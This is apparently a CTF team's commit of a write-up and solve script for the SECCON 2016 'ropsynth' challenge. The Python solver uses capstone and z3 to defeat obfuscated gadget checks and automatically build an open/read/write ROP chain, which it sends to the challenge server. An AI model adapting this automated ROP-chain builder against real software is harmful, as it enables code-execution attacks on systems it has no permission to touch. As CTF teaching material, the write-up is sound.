found an old writeup lying around

I guess we didn't need to submit writeups for this one?

Author: percontation

secconquals2016/ropsynth/README.md

@@ -0,0 +1,72 @@
+## Ropsynth—Binary 400
+
+### Description
+
+The ropsynth challenge prompted competitors to rapidly solve 5 randomized instances of the same ROP exploitation exercise. (It was not a single binary; it was a Python harness around a C tool that enforced that you play the challenge as intended).
+
+This exercise was to write an open/read/write ropchain, from a specific provided pool of gadgets. These gadgets were exactly the `pop rdi/rsi/rdx` & `syscall` & `push rax` you'd want, except that each gadget also popped additional values off the stack and asserted that they matched randomized constants (lightly obfuscated with random `sub`/`add`/`xor`s).
+
+Here's an example of the `pop rdx` gadget from a particular instance:
+
+```
+32d: pop    %rdx              # <- The gadget. Addr gets randomized
+32e: pop    %r13              # ⎫
+330: sub    $0x1891cd04,%r13  # ⎪
+337: sub    $0x6f00ddf3,%r13  # ⎪
+33e: add    $0x42619004,%r13  # ⎪
+345: add    $0x49db471a,%r13  # ⎬ <- A check you have to pass
+34c: xor    $0x3ba35b5a,%r13  # ⎪
+353: sub    $0xbe4fa50,%r13   # ⎪
+35a: cmp    $0x5080daf5,%r13  # ⎪
+361: je     0x366             # ⎭
+363: hlt                      #
+364: hlt                      #
+365: hlt                      #
+366: pop    %r11              # ⎫
+368: xor    $0xacd07b7,%r11   # ⎪
+36f: xor    $0x7c768982,%r11  # ⎪
+376: xor    $0x629e3aee,%r11  # ⎪
+37d: add    $0x667ef815,%r11  # ⎪
+384: sub    $0x3733733f,%r11  # ⎬<- Another check
+38b: add    $0xa17c5cf,%r11   # ⎪
+392: add    $0x52f35cbd,%r11  # ⎪
+399: xor    $0x1eae6ffb,%r11  # ⎪
+3a0: cmp    $0x21bc6ae0,%r11  # ⎪
+3a7: je     0x3ab             # ⎭
+3a9: hlt                      #
+3aa: hlt                      #
+3ab: pop    %rcx              # ⎫
+3ac: add    $0x4bbb4e0,%rcx   # ⎪
+3b3: add    $0x5c3fad54,%rcx  # ⎪
+3ba: add    $0x7649fb35,%rcx  # ⎪
+3c1: add    $0xa6df2ff,%rcx   # ⎬ <- Yet another check
+3c8: xor    $0x5bc9474,%rcx   # ⎪ (IIRC the number of checks per
+3cf: sub    $0x1ffa6009,%rcx  # ⎪  gadget is not consistent
+3d6: xor    $0x5bb89590,%rcx  # ⎪  between problem instances)
+3dd: cmp    $0x6bbfa733,%rcx  # ⎪
+3e4: je     0x3e8             # ⎭
+3e6: hlt                      #
+3e7: hlt                      #
+3e8: retq                     # <- The subsequent return
+```
+
+Because of the time-limits in the challenge harness, the only viable solution was to automate the generation of a suitable rop payload from the provided gadget buffers. (That is, assuming the challenge harness itself could not be exploited. It did a bunch of chroot/seccomp/setuid/munmap stuff that looked safe to me, though).
+
+(Note that all the `hlt`s and the fact that you need to solve 5 instances in a row means that looking for unintended gadgets within the random values probably isn't going to work.)
+
+### Solution
+
+Although the ROP buffer is randomized, it always has the gadgets you need to do:
+
+```
+fd = open(buf, O_RDONLY)
+nbytes = read(fd, buf, 100)
+write(STDOUT_FILENO, buf, nbytes)
+exit(0)
+```
+
+(Helpfully, the challenge provides an R/W buffer `buf == 0x00a00000`, which initially contains the filename you're supposed to read.)
+
+The checks that come after each gadget always take some randomized form of `pop`–`add`/`sub`/`xor`–`cmp`–`je` (and the `pops` only use registers that don't interfere with your syscalls), so parsing the asm to generate a value that passes the check is straightforward to do directly.
+
+That's about it. Our challenge solution is attached in solve.py, which if nothing else serves as a basic CTF example of using capstone and z3py :)

secconquals2016/ropsynth/solve.py

@@ -0,0 +1,192 @@
+import capstone
+import z3
+import subprocess
+from struct import pack
+
+ADDRESS = 0x00800000 # This is where the rop buffer lives
+BUFADDR = 0x00a00000 # This is an r/w buffer for you, helpfully initialized
+                     # to "secret\x00", which is the name of the file you read.
+
+def solve_instance(gadget_buf):
+  gadget_buf = gadget_buf.decode('base64')
+  md = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64)
+  md.skipdata = False
+  disasm = list(md.disasm_lite(gadget_buf, ADDRESS))
+  addrtable = {x[0]:i for i, x in enumerate(disasm)}
+
+  # Step 1: Find `instr`, and parse out the successor instructions
+  # until a `ret` is hit (assuming we meet all the `je` checks to
+  # avoid running into the `hlt`s)
+  def get_gadget(instr):
+    instr = instr.strip()
+    for start, x in enumerate(disasm):
+      if ('%s %s' % (x[2], x[3])).strip() == instr:
+        break
+    else:
+      assert False
+
+    gadget = []
+    end = start
+    while True:
+      gadget.append(disasm[end])
+      if disasm[end][2] == 'je':
+        end = addrtable[int(disasm[end][3], 16)]
+      elif disasm[end][2] == 'ret':
+        break
+      elif disasm[end][2] == 'hlt':
+        assert False
+      else:
+        end += 1
+
+    return gadget
+
+  syscall = get_gadget('syscall')
+  poprdx = get_gadget('pop rdx')
+  poprdi = get_gadget('pop rdi')
+  poprsi = get_gadget('pop rsi')
+  poprax = get_gadget('pop rax')
+
+  # for i in disasm:
+  #   print '%x %s %s' % (i[0], i[2], i[3])
+  # print '----------'
+  # for i in poprsi:
+  #   print '%x %s %s' % (i[0], i[2], i[3])
+
+  # Step 2: Figure out the values needed to pass checks.
+  # Checks take the following form:
+  #   pop reg0
+  #   (add|sub|xor) reg0, $constant
+  #   <repeat a few times>
+  #   cmp reg0, $constant
+  #   je check_passed
+  #   hlt
+  #   ...
+  #   check_passed: <either ret, or another check>
+  def pass_checks(instrs, skip=1):
+    pushes = []
+    idx = skip
+    while True:
+      assert instrs[idx][2] == 'pop'
+      reg = instrs[idx][3]
+      idx += 1
+
+      # Note: You don't actually need z3 for this. Each operation
+      # is trivially invertible, so all you'd have to do is run
+      # through the instructions backwards. BUT Z3 EZ & I AM LAZY.
+      symb_reg = z3.BitVec(reg, 64)
+      x = symb_reg
+
+      while True:
+        mnem = instrs[idx][2]
+        args = instrs[idx][3].split(', ')
+        idx += 1
+        assert len(args) == 2
+        assert args[0] == reg
+        if mnem == 'add':
+          x += int(args[1], 0)
+        elif mnem == 'sub':
+          x -= int(args[1], 0)
+        elif mnem == 'xor':
+          x ^= int(args[1], 0)
+        elif mnem == 'cmp':
+          s = z3.Solver()
+          s.add(x == int(args[1], 0))
+          s.check()
+          pushes.append(s.model()[symb_reg].as_long())
+          break
+        else:
+          assert False
+
+      assert instrs[idx][2] == 'je'
+      idx += 1
+      if instrs[idx][2] == 'ret':
+        break
+    return pushes
+
+  # Helper funcs to generate the rop needed to call specific gadgets
+  def set_rax(x):
+    return [poprax[0][0]] + [x] + pass_checks(poprax)
+  def set_rdi(x):
+    return [poprdi[0][0]] + [x] + pass_checks(poprdi)
+  def set_rsi(x):
+    return [poprsi[0][0]] + [x] + pass_checks(poprsi)
+  def set_rdx(x):
+    return [poprdx[0][0]] + [x] + pass_checks(poprdx)
+  def do_syscall():
+    return [syscall[0][0]] + pass_checks(syscall)
+  # The `pop rdi` and `pop rdx` gadgets have a `push rax` before them
+  def mov_rdi_rax():
+    prev = disasm[addrtable[poprdi[0][0]-1]]
+    assert prev[2:4] == ('push', 'rax')
+    return [prev[0]] + pass_checks(poprdi)
+  def mov_rdx_rax():
+    prev = disasm[addrtable[poprdx[0][0]-1]]
+    assert prev[2:4] == ('push', 'rax')
+    return [prev[0]] + pass_checks(poprdx)
+
+  # Linux syscalls
+  sys_open = 2
+  sys_read = 0
+  sys_write = 1
+  sys_exit_group = 231
+
+  # Step 3: The rop chain.
+  concat = [
+    set_rax(sys_open),
+    set_rdi(BUFADDR),
+    set_rsi(0),
+    do_syscall(),
+
+    mov_rdi_rax(),
+    set_rax(sys_read),
+    set_rsi(BUFADDR),
+    set_rdx(100),
+    do_syscall(),
+
+    mov_rdx_rax(),
+    set_rax(sys_write),
+    set_rdi(1),
+    do_syscall(),
+
+    set_rdi(0),
+    set_rax(sys_exit_group),
+    do_syscall(),
+  ]
+  rop = ''.join(pack('<Q', k) for k in (j for i in concat for j in i))
+  return rop.encode('base64').replace('\n', '')
+
+# gadget_bufs = [open('./gadgets-examples/out01.txt').read(), open('./gadgets-examples/out02.txt').read(), open('./gadgets-examples/out03.txt').read(), open('./gadgets-examples/out04.txt').read(), open('./gadgets-examples/out05.txt').read()]
+# solve_instance(gadget_bufs[0].encode('base64'))
+# exit(0)
+# print solve_instance(subprocess.check_output(('pbpaste',)))
+# exit(0)
+
+import socket
+
+sock = socket.create_connection(('ropsynth.pwn.seccon.jp', 10000))
+f = sock.makefile('rw')
+
+import sys
+def readline():
+  line = f.readline()
+  sys.stdout.write(line)
+  return line
+
+def write(s):
+  sys.stdout.write(s)
+  f.write(s)
+  f.flush()
+
+for i in range(5):
+  t = readline()
+  assert t == "stage %d/5\n" % (i+1)
+
+  write(solve_instance(readline()))
+  write('\n')
+  t = readline()
+  assert t == "OK\n"
+
+import telnetlib
+t = telnetlib.Telnet()
+t.sock = sock
+t.interact()